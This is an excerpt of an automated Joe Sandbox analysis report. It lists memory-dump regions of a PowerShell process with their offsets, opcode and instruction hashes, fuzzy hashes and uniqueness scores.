                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130369450.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a2013b39d24a493c5ff1b8bdc4d4eb5f3044f370060aca0efd668e943ccdd454
                    • Instruction ID: b5ad392c23332d0996a24090f9e45f756b02357ef5ec51230492d83b6775b78b
                    • Opcode Fuzzy Hash: a2013b39d24a493c5ff1b8bdc4d4eb5f3044f370060aca0efd668e943ccdd454
                    • Instruction Fuzzy Hash: 9FE0E52220E3D05FC70353646CB999A7F728F83554B0B01EBD192CF1A7EA585D4AD3A3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130178756.00000000027E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_27e0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 16a5e9d4f608320896fdf13df71d78044223145a7134294a808f99227752b6bd
                    • Instruction ID: 557e98b6c0e2c2fe16d605f4bea2fa833c8dbca991e502ec30b13b1360ac3ab5
                    • Opcode Fuzzy Hash: 16a5e9d4f608320896fdf13df71d78044223145a7134294a808f99227752b6bd
                    • Instruction Fuzzy Hash: 49E092B66006048BD750CF0AFC81452F794EB84630B18C07FDC0D8B711D279B504CAA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129985913.0000000001CA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA2000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1ca2000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 132a2153e1080d0e52052b55ca5944eda34052c07926e2f846cebae66439ba53
                    • Instruction ID: 30c4d58987871391be54d2850cfe61ab371f89296c6421a3e318670c24f30862
                    • Opcode Fuzzy Hash: 132a2153e1080d0e52052b55ca5944eda34052c07926e2f846cebae66439ba53
                    • Instruction Fuzzy Hash: 80D05B752046918FD7178A1CD155B553BA4AF55708F8644FDD840CB663C358D591E201
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129985913.0000000001CA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA2000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1ca2000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 953c38fd5917a44fe441855c1f7603bcc9df7cbc9fd495a734ac0c104d89aabc
                    • Instruction ID: d1a02cfd329c410b06c1cf6c80c56f15512b2f22fece1b218d4411a1cbcccc5f
                    • Opcode Fuzzy Hash: 953c38fd5917a44fe441855c1f7603bcc9df7cbc9fd495a734ac0c104d89aabc
                    • Instruction Fuzzy Hash: E9D05E343012928FEB16CB1CD294F597BE8AF42B08F5644ECAD008B366C3A8E980C600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130369450.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: HYk$HYk$HYk$HYk
                    • API String ID: 0-2143615731
                    • Opcode ID: 08fa89437fc02d63ed2de380110bdcd3f983bcb7c20673d66524f6b29ab68d28
                    • Instruction ID: 6ee693d6d32b26451df1f1e0ab8e0477032363ca5f237663812e6d051d108367
                    • Opcode Fuzzy Hash: 08fa89437fc02d63ed2de380110bdcd3f983bcb7c20673d66524f6b29ab68d28
                    • Instruction Fuzzy Hash: 6F419F3160E3D09FD723577498A57557FB59F83614B1A49EBD088CF2A3DA289C0AC362
                    Uniqueness

                    Uniqueness Score: -1.00%